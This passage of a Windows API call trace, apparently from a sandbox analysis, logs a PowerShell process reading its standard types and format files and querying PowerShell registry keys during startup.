	[0747.898] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.898] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.898] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.899] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.899] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.900] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.900] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.240] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.240] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.241] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.241] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.241] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.242] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.242] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.242] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.243] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.243] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.244] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.244] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.244] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.245] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.245] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.245] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.250] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.250] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.251] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.251] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.251] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.257] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.258] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.258] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0749.258] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1b4, lpOverlapped=0x0) returned 1
	[0749.258] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x0, lpOverlapped=0x0) returned 1
	[0749.259] CloseHandle (hObject=0x314) returned 1
	[0749.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0749.259] SetErrorMode (uMode=0x1) returned 0x1
	[0749.259] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecfa0 | out: lpFileInformation=0x1ecfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0749.259] SetErrorMode (uMode=0x1) returned 0x1
	[0749.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0749.260] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed088 | out: phkResult=0x1ed088*=0x314) returned 0x0
	[0749.260] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed00c, lpData=0x0, lpcbData=0x1ed008*=0x0 | out: lpType=0x1ed00c*=0x1, lpData=0x0, lpcbData=0x1ed008*=0x56) returned 0x0
	[0749.260] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da680
	[0749.260] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecfdc, lpData=0x1b3da680, lpcbData=0x1ecfd8*=0x56 | out: lpType=0x1ecfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecfd8*=0x56) returned 0x0
	[0749.260] CoTaskMemFree (pv=0x1b3da680) 
	[0749.260] RegCloseKey (hKey=0x314) returned 0x0
	[0749.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0749.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0757.365] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0760.177] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0760.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.177] CoTaskMemFree (pv=0x33a820) 
	[0761.277] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed228 | out: phkResult=0x1ed228*=0x2f8) returned 0x0
	[0761.277] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x1ed23c, lpData=0x0, lpcbData=0x1ed238*=0x0 | out: lpType=0x1ed23c*=0x1, lpData=0x0, lpcbData=0x1ed238*=0x74) returned 0x0
	[0761.278] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x1ed1ac, lpData=0x0, lpcbData=0x1ed1a8*=0x0 | out: lpType=0x1ed1ac*=0x1, lpData=0x0, lpcbData=0x1ed1a8*=0x74) returned 0x0
	[0761.278] CoTaskMemAlloc (cb=0x78) returned 0x3809a0
	[0761.278] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x1ed17c, lpData=0x3809a0, lpcbData=0x1ed178*=0x74 | out: lpType=0x1ed17c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed178*=0x74) returned 0x0
	[0761.278] CoTaskMemFree (pv=0x3809a0) 
	[0761.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0761.278] SetErrorMode (uMode=0x1) returned 0x1
	[0761.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed100 | out: lpFileInformation=0x1ed100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0761.278] SetErrorMode (uMode=0x1) returned 0x1
	[0761.279] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0761.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.279] CoTaskMemFree (pv=0x33a820) 
	[0761.281] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0761.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.281] CoTaskMemFree (pv=0x33a820) 
	[0761.282] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0761.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.282] CoTaskMemFree (pv=0x33a820) 
	[0761.282] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0761.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.282] CoTaskMemFree (pv=0x33a820) 
	[0761.283] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0761.283] GetFileType (hFile=0x310) returned 0x1
	[0761.283] SetErrorMode (uMode=0x1) returned 0x1
	[0761.283] GetFileType (hFile=0x310) returned 0x1
	[0761.283] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0761.284] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0761.285] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0761.285] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0761.286] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0761.287] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0761.287] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x9e2, lpOverlapped=0x0) returned 1
	[0761.287] ReadFile (in: hFile=0x310, lpBuffer=0x32137a2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x32137a2*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0761.287] ReadFile (in: hFile=0x310, lpBuffer=0x3214258, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3214258*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0761.287] CloseHandle (hObject=0x310) returned 1
	[0761.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0761.288] SetErrorMode (uMode=0x1) returned 0x1
	[0761.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0761.288] SetErrorMode (uMode=0x1) returned 0x1
	[0761.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0761.288] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0762.528] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0762.528] CoTaskMemAlloc (cb=0x5a) returned 0x1b3d9dc0
	[0762.528] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3d9dc0, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0762.529] CoTaskMemFree (pv=0x1b3d9dc0) 
	[0762.529] RegCloseKey (hKey=0x310) returned 0x0
	[0762.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0762.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0762.532] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x47f510f, Data2=0xbad2, Data3=0x4266, Data4=([0]=0xae, [1]=0x16, [2]=0xce, [3]=0xb1, [4]=0x18, [5]=0x85, [6]=0x61, [7]=0x89))) returned 0x0
	[0762.540] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x25ed1a65, Data2=0xc3b1, Data3=0x4259, Data4=([0]=0xa1, [1]=0x73, [2]=0x79, [3]=0x98, [4]=0x80, [5]=0x81, [6]=0x74, [7]=0xb9))) returned 0x0
	[0763.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.553] SetErrorMode (uMode=0x1) returned 0x1
	[0763.553] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0763.553] GetFileType (hFile=0x310) returned 0x1
	[0763.553] SetErrorMode (uMode=0x1) returned 0x1
	[0763.553] GetFileType (hFile=0x310) returned 0x1
	[0763.553] ReadFile (in: hFile=0x310, lpBuffer=0x30cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30cab58*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.553] ReadFile (in: hFile=0x310, lpBuffer=0x30cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30cab58*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.554] ReadFile (in: hFile=0x310, lpBuffer=0x30cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30cab58*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.554] ReadFile (in: hFile=0x310, lpBuffer=0x30cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30cab58*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.554] ReadFile (in: hFile=0x310, lpBuffer=0x30cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30cab58*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0763.554] ReadFile (in: hFile=0x310, lpBuffer=0x30cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30cab58*, lpNumberOfBytesRead=0x1ecd98*=0xfb2, lpOverlapped=0x0) returned 1
	[0763.554] ReadFile (in: hFile=0x310, lpBuffer=0x30ca272, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30ca272*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0763.555] ReadFile (in: hFile=0x310, lpBuffer=0x30cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x30cab58*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0763.555] CloseHandle (hObject=0x310) returned 1
	[0763.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0763.555] SetErrorMode (uMode=0x1) returned 0x1
	[0763.555] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0763.555] SetErrorMode (uMode=0x1) returned 0x1
	[0763.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
